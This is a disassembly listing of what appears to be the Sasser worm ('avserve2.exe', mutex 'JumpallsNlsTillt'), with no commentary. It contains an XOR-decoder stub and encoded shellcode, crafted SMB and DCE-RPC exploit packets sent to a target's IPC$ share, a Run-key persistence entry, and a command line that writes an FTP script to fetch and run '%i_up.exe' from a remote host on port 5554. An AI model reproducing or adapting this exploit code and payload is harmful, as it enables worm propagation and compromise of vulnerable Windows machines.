dd 77E61BE6h, 77E6E4C8h, 77E99331h, 77E7A099h, 77E7AC37h
dd 77E684C6h, 77F5157Dh, 77E7751Ah, 77E7C2C4h, 77E6BD13h
dd 77E705B0h, 77E7A5FDh, 77F5722Fh, 77E7980Ah, 77F516F8h
dd 77E6C703h, 77E7A13Fh, 77E7849Fh, 77E7C866h, 77E641EBh
dd 77E77CCEh, 77E79D8Ch, 77F6183Eh, 77F51597h, 77E79E34h
dd 77E7C726h, 77E76E0Bh, 77E78406h, 77E781F9h, 77E77405h
dd 77E79F93h, 77E6177Ah, 77E7C938h, 77E7C486h, 77E75CB5h
dd 77E616B4h, 77E79C90h, 77EB9A84h, 77E9C5B1h, 77E7C9E1h
dd 77E79924h, 77E67702h, 77E77EE1h, 77E7C931h, 77E79C3Dh
dd 0
dd 77D4C96Ah, 0
dd 71AB868Dh, 71AB5690h, 71AB1AF4h, 71AB1746h, 71AB3C22h
dd 71AB3E5Dh, 71AB5DE2h, 71AB32CAh, 71AB401Ch, 71AB12F8h
dd 71AB2BBFh, 71AB41DAh, 71AB3ECEh, 71AB1A6Dh, 0
dd 73770000h, 6E697270h, 416674h, 52455355h, 642E3233h
dd 6C6Ch, 65470000h, 6F725074h, 64644163h, 73736572h, 0
aLoadlibrarya db 'LoadLibraryA',0
align 4
aLstrcpya db 'lstrcpyA',0
align 4
a_lclose db '_lclose',0
dd 6C5F0000h, 74697277h, 65h, 72636C5Fh, 746165h, 6C530000h
dd 706565h, 6C5F0000h, 64616572h, 0
a_lopen db '_lopen',0
align 10h
dd 65470000h, 646F4D74h, 46656C75h, 4E656C69h, 41656D61h
dd 0
aCreatethread_0 db 'CreateThread',0
align 4
aWinexec db 'WinExec',0
dd 65470000h, 73614C74h, 72724574h, 726Fh, 65470000h, 63695474h
dd 756F436Bh, 746Eh, 72430000h, 65746165h, 6574754Dh, 4178h
dd 6F430000h, 69467970h, 41656Ch, 65470000h, 6E695774h
dd 73776F64h, 65726944h, 726F7463h, 4179h, 4E52454Bh, 32334C45h
dd 6C6C642Eh, 53570000h, 32335F32h, 6C6C642Eh, 0
aAbortsystemshu db 'AbortSystemShutdownA',0
align 4
aRegclosekey db 'RegCloseKey',0
dd 65520000h, 74655367h, 756C6156h, 41784565h, 0
aRegopenkeya db 'RegOpenKeyA',0
aAdvapi32_dll db 'ADVAPI32.dll',0
align 4
aGetmodulehandl db 'GetModuleHandleA',0
align 4
aGetstartupinfo db 'GetStartupInfoA',0
dd 65470000h, 6D6F4374h, 646E616Dh, 656E694Ch, 41h, 56746547h
dd 69737265h, 6E6Fh, 78450000h, 72507469h, 7365636Fh, 73h
dd 6D726554h, 74616E69h, 6F725065h, 73736563h, 0
aGetcurrentproc db 'GetCurrentProcess',0
align 10h
aUnhandledexcep db 'UnhandledExceptionFilter',0
align 4
aFreeenvironmen db 'FreeEnvironmentStringsA',0
dd 72460000h, 6E456565h, 6F726976h, 6E656D6Eh, 72745374h
dd 73676E69h, 57h, 65646957h, 72616843h, 754D6F54h, 4269746Ch
dd 657479h, 65470000h, 766E4574h, 6E6F7269h, 746E656Dh
dd 69727453h, 73676Eh, 65470000h, 766E4574h, 6E6F7269h
dd 746E656Dh, 69727453h, 5773676Eh, 0
aSethandlecount db 'SetHandleCount',0
align 4
dd 65470000h, 64745374h, 646E6148h, 656Ch, 65470000h, 6C694674h
dd 70795465h, 65h, 70616548h, 74736544h, 796F72h, 65480000h
dd 72437061h, 65746165h, 0
aVirtualfree db 'VirtualFree',0
dd 65480000h, 72467061h, 6565h, 74520000h, 776E556Ch, 646E69h
dd 72570000h, 46657469h, 656C69h, 754D0000h, 4269746Ch
dd 54657479h, 6469576Fh, 61684365h, 72h, 53746547h, 6E697274h
dd 70795467h, 4165h, 65470000h, 72745374h, 54676E69h, 57657079h
dd 0
aGetcpinfo db 'GetCPInfo',0
align 4
aGetacp db 'GetACP',0
align 4
dd 65470000h, 4D454F74h, 5043h, 65480000h, 6C417061h, 636F6Ch
dd 69560000h, 61757472h, 6C6C416Ch, 636Fh, 65480000h, 65527061h
dd 6F6C6C41h, 63h, 614D434Ch, 72745370h, 41676E69h, 0
aLcmapstringw db 'LCMapStringW',0
align 4
dd 191h dup(0)
dword_406000 dd 0 ; DATA XREF: sub_402AC1+1F�o
dword_406004 dd 0 ; DATA XREF: sub_402AC1+1A�o
dword_406008 dd 0 ; DATA XREF: sub_402AC1+10�o
dd offset sub_403C6B
dword_406010 dd 0 ; DATA XREF: sub_402AC1:loc_402ACC�o
dword_406014 dd 0 ; DATA XREF: sub_402B10+65�o
dword_406018 dd 0 ; DATA XREF: sub_402B10:loc_402B70�o
dword_40601C dd 0 ; DATA XREF: sub_402B10+76�o
dword_406020 dd 4 dup(0) ; DATA XREF: sub_402B10:loc_402B81�o
off_406030 dd offset aEchoOffEchoOpe ; DATA XREF: sub_40127D+AA�r
; "echo off&echo open %s 5554>>cmd.ftp&ech"...
; ---------------------------------------------------------------------------
loc_406034: ; DATA XREF: sub_40159E+132�o
; sub_40159E+1AB�o
jmp short loc_406046
; =============== S U B R O U T I N E =======================================
sub_406036 proc near ; CODE XREF: sub_406036:loc_406046�p
pop edx
dec edx
xor ecx, ecx
mov cx, 17Dh
loc_40603E: ; CODE XREF: sub_406036+C�j
xor byte ptr [edx+ecx], 99h
loop loc_40603E
jmp short loc_40604B
; ---------------------------------------------------------------------------
loc_406046: ; CODE XREF: .text:loc_406034�j
call sub_406036
loc_40604B: ; CODE XREF: sub_406036+E�j
jo short near ptr dword_4059BC+626h
cwde
cdq
cdq
retn
sub_406036 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
db 0FDh, 38h, 0A9h
dd 12999999h, 0E91295D9h, 0D9123485h, 12411291h, 0ED12A5EAh
dd 6A9AE187h, 9AB9E712h, 8DD71262h, 0CECF74AAh, 9AA612C8h
dd 0F36B1262h, 3F6AC097h, 0C6C091EDh, 0DC9D5E1Ah, 0C6C0707Bh
dd 125412C7h, 5A9ABDDFh, 589A7848h, 12FF50AAh, 85DF1291h
dd 78585A9Ah, 12589A9Bh, 125A9A99h, 1A6E1263h, 4912975Fh
dd 71C09AF3h, 9999991Eh, 0CB945F1Ah, 65CE66CFh, 0F34112C3h
dd 0ED71C09Ch, 0C9999999h, 0F3C9C9C9h, 669BF398h, 411275CEh
dd 999B9E5Eh
dword_4060E4 dd 59AA4B9Dh, 0F39DDE10h, 66CACE89h, 98F369CEh, 6DCE66CAh
; DATA XREF: sub_40159E+102�o
dd 66CAC9C9h, 491261CEh, 12DD751Ah, 0F359AA6Dh, 9D10C089h
dd 10627B17h, 0CF10A1CFh, 0D9CF10A5h, 0B5DF5EFFh, 0DE149898h
dd 0AACFC989h, 0C8C8C850h, 0C8C898F3h, 0FAA5DE5Eh, 1499FDF4h
dd 0C8C9A5DEh, 0CB79CE66h, 0CA65CE66h, 0C965CE66h, 0AA7DCE66h
dd 591C3559h, 0CBC860ECh, 4B66CACFh, 7B32C0C3h, 5A59AA77h
dd 66677671h, 0EDFCDE66h, 0FAF6EBC9h, 0EBFDFDD8h, 99EAEAFCh
dd 0F8FCEBDAh, 0EBC9FCEDh, 0EAFCFAF6h, 0DC99D8EAh, 0CDEDF0E1h
dd 0F8FCEBF1h, 0F6D599FDh, 0F0D5FDF8h, 0EBF8EBFBh, 0EE99D8E0h
dd 0AAC6ABEAh, 0CACE99ABh, 0FAF6CAD8h, 0D8EDFCF2h, 0F7F0FB99h
dd 0F0F599FDh, 0F7FCEDEAh, 0FAFAF899h, 99EDE9FCh, 0EAF6F5FAh
dd 0FAF6EAFCh, 99EDFCF2h, 0
dword_4061CC dd 85000000h, 424D53FFh, 72h, 0C8531800h, 3 dup(0)
; DATA XREF: sub_401398+15D�o
; sub_40159E+2BD�o
dd 0FEFF0000h, 0
dd 2006200h
aPcNetworkProgr db 'PC NETWORK PROGRAM 1.0',0
db 2
db 4Ch ; L
db 41h, 4Eh, 4Dh
db 41h ; A
db 4Eh, 31h, 2Eh
db 30h ; 0
align 2
dw 5702h
aIndowsForWorkg db 'indows for Workgroups 3.1a',0
db 2
dd 2E314D4Ch, 30305832h, 4C020032h, 414D4E41h, 312E324Eh
dd 544E0200h, 204D4C20h, 32312E30h, 0
dword_406258 dd 0A4000000h, 424D53FFh, 73h, 0C8071800h, 3 dup(0)
; DATA XREF: sub_401398+188�o
; sub_40159E+2EC�o
dd 0FEFF0000h, 100000h, 0A400FF0Ch, 0A110400h, 0
dd 20000000h, 0
dd 0D400h, 4E006980h, 534D4C54h, 1005053h, 97000000h, 0E00882h
dd 4 dup(0)
aWindows2000219:
unicode 0, <Windows 2000 2195>,0
aWindows20005_0:
unicode 0, <Windows 2000 5.0>,0
align 10h
dd 0
dword_406304 dd 0DA000000h, 424D53FFh, 73h, 0C8071800h, 3 dup(0)
; DATA XREF: sub_401398+1AD�o
; sub_40159E+315�o
dd 0FEFF0000h, 200800h, 0DA00FF0Ch, 0A110400h, 0
dd 57000000h, 0
dd 0D400h, 4E009F80h, 534D4C54h, 3005053h, 1000000h, 46000100h
dd 0
dd 47000000h, 0
dd 40000000h, 0
dd 40000000h, 6000000h, 40000600h, 10000000h, 47001000h
dd 15000000h, 48E0888Ah, 44004F00h, 19810000h, 0E4F27A6Ah
dd 0AF281C49h, 10742530h, 575367h, 6E0069h, 6F0064h, 730077h
dd 320020h, 300030h, 200030h, 310032h, 350039h, 570000h
dd 6E0069h, 6F0064h, 730077h, 320020h, 300030h, 200030h
dd 2E0035h, 30h, 0
dword_4063E4 dd 5C000000h, 424D53FFh, 75h, 0C8071800h, 3 dup(0)
; DATA XREF: sub_401398+53�o
; sub_40159E+57�o
dd 0FEFF0000h, 300800h, 5C00FF04h, 1000800h, 3100h, 5C005Ch
dd 390031h, 2E0032h, 360031h, 2E0038h, 2E0031h, 310032h
dd 5C0030h, 500049h
aC: ; DATA XREF: sub_401398+85�o
; sub_40159E+89�o
unicode 0, <C$>,0
a????? db '?????',0
align 8
dword_406448 dd 64000000h, 424D53FFh, 0A2h, 0C8071800h, 3 dup(0)
; DATA XREF: sub_40159E+369�o
dd 4DC0800h, 400800h, 0DE00FF18h, 0E00DEh, 16h, 0
dd 2019Fh, 3 dup(0)
dd 3, 1, 40h, 2, 1103h, 6C005Ch, 610073h, 700072h, 63h
dd 0
dword_4064B4 dd 9C000000h, 424D53FFh, 25h, 0C8071800h, 3 dup(0)
; DATA XREF: sub_40159E+392�o
dd 4DC0800h, 500800h, 48000010h, 0
dd 4, 2 dup(0)
dd 48005400h, 2005400h, 2600h, 10005940h, 50005Ch, 500049h
dd 5C0045h, 0
dd 30B0005h, 10h, 48h, 1, 10B810B8h, 0
dd 1, 10000h, 3919286Ah, 11D0B10Ch, 0C000A89Bh, 0F52ED94Fh
dd 0
dd 8A885D04h, 11C91CEBh, 8E89Fh, 6048102Bh, 2, 0
dword_406558 dd 0F40C0000h, 424D53FFh, 25h, 0C8071800h, 3 dup(0)
; DATA XREF: sub_40159E+3C8�o
dd 4DC0800h, 600800h, 0A0000010h, 0Ch, 4, 2 dup(0)
dd 0A0005400h, 200540Ch, 2600h, 100CB140h, 50005Ch, 500049h
dd 5C0045h, 0
dd 3000005h, 10h, 0CA0h, 1, 0C88h, 90000h, 3ECh, 0
dd 3ECh, 0
off_4065D8 dd offset loc_401495 ; DATA XREF: sub_40159E+3F6�o
dd 3, 40707Ch, 1, 0
dd 1, 0
dd 1, 0
dd 1, 0
dd 1, 0
dd 1, 0
dd 1, 0
dd 1, 0
dd offset dword_40707C
dd 1, 0
dd 1, 0
dd offset dword_40707C
dd 1, 0
dd 1, 0
dd offset dword_40707C
dd 1, 0
dd 1, 0
dd 138578h, 0E9A65BABh, 0
dword_40666C dd 0F8100000h, 424D53FFh, 2Fh, 0C8071800h, 3 dup(0)
; DATA XREF: sub_40159E+425�o
dd 0FEFF0800h, 600800h, 0DE00FF0Eh, 4000DEh, 0FF000000h
dd 8FFFFFFh, 10B800h, 4010B800h, 0
dd 0EE10B900h, 1000005h, 10h, 10B8h, 1, 200Ch, 90000h
dd 0DADh, 0
dd 0DADh, 0
dword_4066D8 dd 0D80F0000h, 424D53FFh, 25h, 0C8071800h, 3 dup(0)
; DATA XREF: sub_40159E+450�o
dd 1180800h, 700800h, 84000010h, 0Fh, 4, 2 dup(0)
dd 84005400h, 200540Fh, 2600h, 0F9540h, 50005Ch, 500049h
dd 5C0045h, 0
dd 2000005h, 10h, 0F84h, 1, 0F6Ch, 90000h, 0
dword_40674C dd 0 ; DATA XREF: sub_40159E+47E�o
dd 40A89Ah, 1, 0
dd 1, 0
dd 1, 0
dd 1, 0
dd 1, 0
dd 1, 0
dd 1, 0
dd 1, 0
dd 40A89Ah, 1, 0
dd 1, 0
dd 40A89Ah, 1, 0
dd 1, 0
dd 40A89Ah, 1, 0
dd 1, 4 dup(0)
dd 20h, 0Ch dup(0)
dword_406810 dd 1004600h ; DATA XREF: sub_40159E+16B�r
; sub_40159E+19E�r
dd 1, 20h, 0Ch dup(0)
dd 7515123Ch, 2, 20h, 0Ch dup(0)
dd 751C123Ch, 0Fh dup(0)
off_4068C8 dd offset aAvserve2_exe ; DATA XREF: sub_4020D7:loc_40212F�r
; sub_4020D7+B5�r
; "avserve2.exe"
dd offset aAvserve2 ; "avserve2"
off_4068D0 dd offset dword_406910 ; DATA XREF: sub_401B08+1A�r
; sub_401B08+2D�r
off_4068D4 dd offset dword_406908 ; DATA XREF: sub_401B08+77�r
; sub_401B08+84�r
off_4068D8 dd offset dword_406900 ; DATA XREF: sub_401B08+A8�r
; sub_401B08+B5�r
off_4068DC dd offset dword_4068F8 ; DATA XREF: sub_401B08+2BC�r
; sub_401B08+2C9�r ...
off_4068E0 dd offset dword_4068F0 ; DATA XREF: sub_401B08+184�r
; sub_401B08+191�r
off_4068E4 dd offset dword_4068E8 ; DATA XREF: sub_401B08+1B9�r
; sub_401B08+1C6�r
dword_4068E8 dd 20303531h, 0A4B4Fh ; DATA XREF: .text:off_4068E4�o
dword_4068F0 dd 20303032h, 0A4B4Fh ; DATA XREF: .text:off_4068E0�o
dword_4068F8 dd 20363232h, 0A4B4Fh ; DATA XREF: .text:off_4068DC�o
dword_406900 dd 20303332h, 0A4B4Fh ; DATA XREF: .text:off_4068D8�o
dword_406908 dd 20313333h, 0A4B4Fh ; DATA XREF: .text:off_4068D4�o
dword_406910 dd 20303232h, 0A4B4Fh ; DATA XREF: .text:off_4068D0�o
aAvserve2 db 'avserve2',0 ; DATA XREF: .text:004068CC�o
align 4
aAvserve2_exe db 'avserve2.exe',0 ; DATA XREF: .text:off_4068C8�o
align 4
aEchoOffEchoOpe db 'echo off&echo open %s 5554>>cmd.ftp&echo anonymous>>cmd.ftp&echo '
; DATA XREF: .text:off_406030�o
db 'user&echo bin>>cmd.ftp&echo get %i_up.exe>>cmd.ftp&echo bye>>cmd.'
db 'ftp&echo on&ftp -s:cmd.ftp&%i_up.exe&echo off&del cmd.ftp&echo on'
db 0Ah,0
align 4
a127_0_0_1 db '127.0.0.1',0 ; DATA XREF: sub_4010D2:loc_401140�o
align 4
aCWin2_log db 'c:\win2.log',0 ; DATA XREF: sub_401210+27�o
aI db '%i',0 ; DATA XREF: sub_401210+16�o
align 4
aSC db '%s%c',0 ; DATA XREF: sub_401398+1DF�o
align 10h
aSIpc db '\\%s\ipc$',0 ; DATA XREF: sub_401398+20�o
; sub_40159E+23�o
align 4
dword_406A2C dd 6EB06EBh, 0 ; DATA XREF: sub_40159E+1CC�o
dword_406A34 dd 1CEC8166h ; DATA XREF: sub_40159E+D�r
dword_406A38 dd 0E4FF07h ; DATA XREF: sub_40159E+18�r
dword_406A3C dd 302E35h ; DATA XREF: sub_401A84+4A�o
dword_406A40 dd 312E35h ; DATA XREF: sub_401A84+27�o
aQuit db 'QUIT',0 ; DATA XREF: sub_401B08+2DA�o
align 4
aRetr db 'RETR',0 ; DATA XREF: sub_401B08+1A2�o
align 4
aI_I_I_I db '%i.%i.%i.%i',0 ; DATA XREF: sub_401B08+173�o
; sub_401EF0+D2�o
word_406A60 dw 2Ch ; DATA XREF: sub_401B08+EE�r
align 4
aPort db 'PORT',0 ; DATA XREF: sub_401B08+C6�o
align 4
aPass db 'PASS',0 ; DATA XREF: sub_401B08+95�o
align 4
aUser db 'USER',0 ; DATA XREF: sub_401B08+64�o
align 4
asc_406A7C: ; DATA XREF: sub_401EF0+102�o
unicode 0, < >,0
aJumpallsnlstil db 'JumpallsNlsTillt',0 ; DATA XREF: sub_402029+50�o
align 4
aJobaka3 db 'Jobaka3',0 ; DATA XREF: sub_402029+F�o
aSoftwareMicros db 'SOFTWARE\Microsoft\Windows\CurrentVersion\Run',0
; DATA XREF: sub_4020D7+8C�o
align 4
asc_406ACC: ; DATA XREF: sub_4020D7+4B�o
unicode 0, <\>,0
off_406AD0 dd offset sub_402AFF ; DATA XREF: sub_402934+1C�r
dword_406AD4 dd 2 ; DATA XREF: sub_403590+E�r
; sub_4035C9+46�r
align 10h
off_406AE0 dd offset word_406AEA ; DATA XREF: sub_402810+1E�r
; sub_402A4C+12�r ...
dd offset word_406AEA
db 2 dup(0)
word_406AEA dw 20h ; DATA XREF: sub_403876+18�r
; .text:off_406AE0�o ...
unicode 0, < ((((( H>
dd 7 dup(100010h), 840010h, 4 dup(840084h), 100084h, 3 dup(100010h)
dd 3 dup(810081h), 0Ah dup(10001h), 3 dup(100010h), 3 dup(820082h)
dd 0Ah dup(20002h), 2 dup(100010h), 20h, 40h dup(0)
dword_406CEC dd 1 ; DATA XREF: sub_402810�r
dd 2Eh, 1
dword_406CF8 dd 0C0000005h ; DATA XREF: sub_402D04+A�r
; sub_402D04+11�o
dd 0Bh, 0
dd 0C000001Dh, 4, 0
dd 0C0000096h, 4, 0
db 8Dh, 0
dw 0C000h
dd 8, 0
dd 0C000008Eh, 8, 0
dd 0C000008Fh, 8, 0
db 90h
db 2 dup(0), 0C0h
dd 8, 0
dd 0C0000091h, 8, 0
dd 0C0000092h, 8, 0
dd 0C0000093h, 8, 0
dword_406D70 dd 3 ; DATA XREF: sub_402BC3+58�r
dword_406D74 dd 7 ; DATA XREF: sub_402BC3+5E�r
dword_406D78 dd 0Ah ; DATA XREF: sub_402D04+4�r
dword_406D7C dd 8Ch ; DATA XREF: sub_402BC3+82�r
; sub_402BC3+8F�w ...
dd 0FFFFFFFFh, 0A00h, 10h
dword_406D8C dd 19930520h, 4 dup(0) ; DATA XREF: .text:0040348F�o
; sub_403496+2�o
dword_406DA0 dd 2 ; DATA XREF: sub_4035C9+E�o
; sub_4035C9+28�r
off_406DA4 dd offset aR6002FloatingP ; DATA XREF: sub_4035C9+FC�r
; sub_4035C9+12D�r
; "R6002\r\n- floating point not loaded\r\n"
dd 8, 40536Ch, 9, 405340h, 0Ah, 40531Ch, 10h, 4052F0h
dd 11h, 4052C0h, 12h, 40529Ch, 13h, 405270h, 18h, 405238h
dd 19h, 405210h, 1Ah, 4051D8h, 1Bh, 4051A0h, 1Ch, 405178h
dd 78h, 405168h, 79h, 405158h, 7Ah, 405148h, 0FCh, 405144h
dd 0FFh, 405134h
byte_406E30 db 1 ; DATA XREF: sub_4035C9+1B�o
; sub_4038A7+E1�r
db 2, 4, 8
align 8
dword_406E38 dd 3A4h ; DATA XREF: sub_4038A7+2F�o
dword_406E3C dd 82798260h, 21h, 0 ; DATA XREF: sub_4038A7+11D�r
dword_406E48 dd 0DFA6h ; DATA XREF: sub_4038A7+C0�r
align 10h
dd 0A5A1h, 0
dd 0FCE09F81h, 0
dd 0FC807E40h, 0
dd 3A8h, 0A3DAA3C1h, 20h, 5 dup(0)
dd 0FE81h, 0
dd 0FE40h, 0
dd 3B5h, 0A3DAA3C1h, 20h, 5 dup(0)
dd 0FE81h, 0
dd 0FE41h, 0
dd 3B6h, 0A2E4A2CFh, 0A2E5001Ah, 5BA2E8h, 4 dup(0)
dd 0FE81h, 0
dd 0FEA17E40h, 0
dd 551h, 0DA5EDA51h, 0DA5F0020h, 32DA6Ah, 4 dup(0)
dd 0DED8D381h, 0F9E0h, 0FE817E31h, 0
dword_406F28 dd 3F8h ; DATA XREF: sub_4038A7+3C�o
; sub_403CF4+5�r
align 10h
dword_406F30 dd 8D22651Fh ; DATA XREF: sub_401000�r
; sub_401000+10�w ...
dword_406F34 dd 0 ; DATA XREF: sub_401210+6�w
; sub_401210+D�r
dword_406F38 dd 0 ; DATA XREF: sub_40127D+89�o
; sub_401398+C�o ...
dword_406F3C dd 0 ; DATA XREF: sub_402680+3B�r
; sub_402680+91�w
dword_406F40 dd 0 ; DATA XREF: sub_40283E+84�w
; sub_402D9F:loc_402DB1�r ...
align 8
dword_406F48 dd 0 ; DATA XREF: sub_402934�r sub_402959�r ...
dd 3 dup(0)
dword_406F58 dd 0A28h ; DATA XREF: sub_40283E+52�w
dword_406F5C dd 501h ; DATA XREF: sub_40283E+49�w
dword_406F60 dd 5 ; DATA XREF: sub_40283E+3E�w
dword_406F64 dd 1 ; DATA XREF: sub_40283E+30�w
dword_406F68 dd 1 ; DATA XREF: sub_402E58+91�w
dword_406F6C dd 0CB0B00h ; DATA XREF: sub_402E58+89�w
dd 0
dword_406F74 dd 0CB0A80h ; DATA XREF: sub_402D9F+44�w
dd 3 dup(0)
off_406F84 dd offset aCM_unpackerPac ; DATA XREF: sub_402E58+2E�w
; "C:\\m_unpacker\\packed.exe"
dd 0
byte_406F8C db 0 ; DATA XREF: sub_402B10+2D�w
align 10h
dword_406F90 dd 0 ; DATA XREF: sub_402B10+27�w
dword_406F94 dd 0 ; DATA XREF: sub_402B10+4�r
; sub_402B10+8B�w
dword_406F98 dd 0 ; DATA XREF: sub_402BC3+3A�r
; sub_402BC3+46�w ...
aCM_unpackerPac db 'C:\m_unpacker\packed.exe',0 ; DATA XREF: sub_402E58:loc_402E6F�o
; .text:off_406F84�o
align 4
dd 31h dup(0)
dword_40707C dd 9 dup(0) ; DATA XREF: .text:00406624�o
; .text:00406638�o ...
dword_4070A0 dd 1 ; DATA XREF: sub_4030A5+2�r
; sub_4030A5+23�w ...
dword_4070A4 dd 0 ; DATA XREF: sub_403590+21�r
dword_4070A8 dd 1 ; DATA XREF: sub_40371C+26�r
; sub_40371C:loc_403786�w
dword_4070AC dd 1 ; DATA XREF: sub_4038A7:loc_403A22�r
; sub_403A40+4�w ...
dword_4070B0 dd 0 ; DATA XREF: sub_404573+3�r
; sub_404573+2E�w ...
dword_4070B4 dd 0 ; DATA XREF: sub_404573+43�w
; sub_404573:loc_4045C2�r
dword_4070B8 dd 0 ; DATA XREF: sub_404573+4A�w
; sub_404573+60�r
dd 2 dup(0)
dword_4070C4 dd 0 ; DATA XREF: sub_40371C+7B�r
dd 3 dup(0)
dword_4070D4 dd 0 ; DATA XREF: sub_40371C+A6�r
; sub_403A40+3A�r ...
dd 0
dword_4070DC dd 1 ; DATA XREF: sub_4046FE+28�r
; sub_4046FE+4C�w ...
dword_4070E0 dd 0 ; DATA XREF: sub_403CB6�r
dword_4070E4 dd 0 ; DATA XREF: sub_40494D�r
dword_4070E8 dd 10h ; DATA XREF: sub_403D2A+32�w
; sub_4043C7+5�r ...
dword_4070EC dd 0 ; DATA XREF: sub_403D93+239�r
; sub_403D93+259�r ...
dword_4070F0 dd 320650h ; DATA XREF: sub_403D2A+2D�w
; sub_403D93+310�w ...
dword_4070F4 dd 0 ; DATA XREF: sub_403D2A:loc_403D47�w
; sub_403D93+22C�r ...
dword_4070F8 dd 1 ; DATA XREF: sub_403D2A+24�w
; sub_403D68�r ...
dword_4070FC dd 320650h ; DATA XREF: sub_403D2A+15�w
; sub_403D68+8�r ...
dword_407100 dd 4E4h ; DATA XREF: sub_4038A7+14�r
; sub_4038A7+65�w ...
align 10h
dword_407110 dd 3 dup(0) ; DATA XREF: sub_4038A7+123�o
; sub_4038A7+171�o ...
dword_40711C dd 0 ; DATA XREF: sub_4038A7+108�w
; sub_4038A7+15D�w ...
byte_407120 db 0 ; DATA XREF: sub_403AE6:loc_403BF2�w
; sub_403AE6:loc_403C0F�w ...
align 4
dd 0Fh dup(0)
dd 63626100h, 67666564h, 6B6A6968h, 6F6E6D6Ch, 73727170h
dd 77767574h, 7A7978h, 0
dd 43424100h, 47464544h, 4B4A4948h, 4F4E4D4Ch, 53525150h
dd 57565554h, 5A5958h, 0
dd 83000000h, 0
dd 9A0000h, 9E009Ch, 2 dup(0)
dd 8A0000h, 0FF8E008Ch, 2 dup(0)
dd 0AA0000h, 2 dup(0)
dd 0B500h, 0BA0000h, 0
dd 0E3E2E1E0h, 0E7E6E5E4h, 0EBEAE9E8h, 0EFEEEDECh, 0F3F2F1F0h
dd 0F6F5F4h, 0FBFAF9F8h, 0DFFEFDFCh, 0C3C2C1C0h, 0C7C6C5C4h
dd 0CBCAC9C8h, 0CFCECDCCh, 0D3D2D1D0h, 0D6D5D4h, 0DBDAD9D8h
dd 9FDEDDDCh
byte_407220 db 0 ; DATA XREF: sub_4038A7+5C�o
; sub_4038A7+AF�o ...
byte_407221 db 0 ; DATA XREF: sub_402EF1+3F�r
; sub_402EF1+84�r ...
align 4
dd 0Fh dup(0)
dd 10100000h, 6 dup(10101010h), 0
dd 20200000h, 6 dup(20202020h), 2 dup(0)
dd 20h, 10000000h, 10001000h, 2 dup(0)
dd 20000000h, 20002000h, 10h, 0
dd 20000000h, 2 dup(0)
dd 200000h, 20000000h, 0
dd 10101000h, 5 dup(10101010h), 10101000h, 10101010h, 6 dup(20202020h)
dd 20202000h, 20202020h, 20h
dword_407324 dd 0 ; DATA XREF: sub_4038A7+6E�w
; sub_4038A7+12B�w ...
dword_407328 dd 320000h ; DATA XREF: sub_403382+19�w
; sub_403382+29�r ...
dd 5 dup(0)
dword_407340 dd 0CB0EF0h ; DATA XREF: sub_4031D7:loc_4031F7�w
; sub_4031D7+45�r ...
dword_407344 dd 3Fh dup(0) ; DATA XREF: sub_4031D7+92�o
dword_407440 dd 20h ; DATA XREF: sub_4031D7+26�w
; sub_4031D7:loc_403261�r ...
dword_407444 dd 1 ; DATA XREF: sub_402D9F+AD�w
dword_407448 dd 1 ; DATA XREF: sub_402D47�r sub_402D9F+3�r ...
dword_40744C dd 0 ; DATA XREF: sub_402B10+3E�r
dword_407450 dd 0 ; DATA XREF: sub_402B10+35�r
; sub_402B10+57�r
dword_407454 dd 0 ; DATA XREF: sub_402AC1�r
dword_407458 dd 452340h ; DATA XREF: sub_40283E+7A�w
; sub_402D47+F�r ...
dd 6E9h dup(0)
_text ends
; Section 3. (virtual address 0001A000)
; Virtual size : 00020000 ( 131072.)
; Section size in file : 00020000 ( 131072.)
; Offset to raw data for section: 0001A000
; Flags C0000040: Data Readable Writable
; Alignment : default
; ===========================================================================
; Segment type: Pure data
; Segment permissions: Read/Write
_data segment para public 'DATA' use32
assume cs:_data
;org 41A000h
; =============== S U B R O U T I N E =======================================
public start
start proc near
pusha
call sub_440946
popa
jmp sub_40283E
start endp
; ---------------------------------------------------------------------------
db 0
byte_41A00D db 33h, 75h, 90h ; DATA XREF: .bss:off_44A610�o
dd 300h, 400h, 0FFFF00h, 0B800h, 0
dd 4000h, 8 dup(0)
dd 8000h, 207E2500h, 85C06420h, 2312CFE3h, 908A41DEh, 1E7030F7h
dd 845CF00Ah, 7352597h, 5295149h, 0E5945F72h, 66EBE628h
dd 1B147DACh, 0C44E86B0h, 0BD17AB2Ch, 231E7BDFh, 803CDC2Eh
dd 1D8C4BE5h, 0AD71B1h, 6014C00h, 146A8000h, 46h, 0
dd 0E00E000h, 2010B21h, 0AE0037h, 360000h, 5C0000h, 119600h
dd 100000h, 0C00000h, 0
dd 100010h, 20000h, 100h, 0
dd 400h, 0
dd 1800000h, 40000h, 0
dd 200h, 10000000h, 100000h, 10000000h, 100000h, 0
dd 1000h, 1700000h, 4C00h, 1400000h, 1CC00h, 6 dup(0)
dd 1500000h, 143400h, 14h dup(0)
dd 65742E00h, 7478h, 0AC1000h, 100000h, 0AC1000h, 40000h
dd 3 dup(0)
dd 2000h, 73622E60h, 73h, 5BD800h, 0C00000h, 5 dup(0)
dd 8000h, 61642EC0h, 6174h, 1A1C00h, 1200000h, 1A1C00h
dd 0B20000h, 3 dup(0)
dd 4000h, 64692EC0h, 617461h, 1CC00h, 1400000h, 1CC00h
dd 0CE0000h, 3 dup(0)
dd 6000h, 65722EC0h, 636F6Ch, 143C00h, 1500000h, 143C00h
dd 0D20000h, 3 dup(0)
dd 2000h, 64652E02h, 617461h, 4C00h, 1700000h, 4C00h, 0E80000h
dd 3 dup(0)
dd 2000h, 40h, 65h dup(0)
dd 1B800h, 31C30000h, 4C8B40C0h, 41F70424h, 604h, 8B0F7400h
dd 8B082444h, 89102454h, 3B802h
db 2 dup(0), 0C3h
; =============== S U B R O U T I N E =======================================
sub_41A433 proc near ; CODE XREF: .data:0041A55B�p
; .data:0041A589�p
var_14 = dword ptr -14h
arg_0 = dword ptr 4
arg_4 = dword ptr 8
push ebx
push esi
push edi
mov eax, [esp+0Ch+arg_0]
push eax
push 0FFFFFFFEh
push 10001006h
push large dword ptr fs:0
mov large fs:0, esp
loc_41A450: ; CODE XREF: sub_41A433+44�j
; sub_41A433+4A�j
mov eax, [esp+1Ch+arg_0]
mov ebx, [eax+8]
mov esi, [eax+0Ch]
cmp esi, 0FFFFFFFFh
jz short loc_41A47F
cmp esi, [esp+1Ch+arg_4]
jz short loc_41A47F
lea esi, [esi+esi*2]
mov ecx, [ebx+esi*4]
mov ecx, [esp+1Ch+var_14]
mov ecx, [eax+0Ch]
cmp dword ptr [ebx+esi*4+4], 0
jnz short loc_41A450
call dword ptr [ebx+esi*4+8]
jmp short loc_41A450
; ---------------------------------------------------------------------------
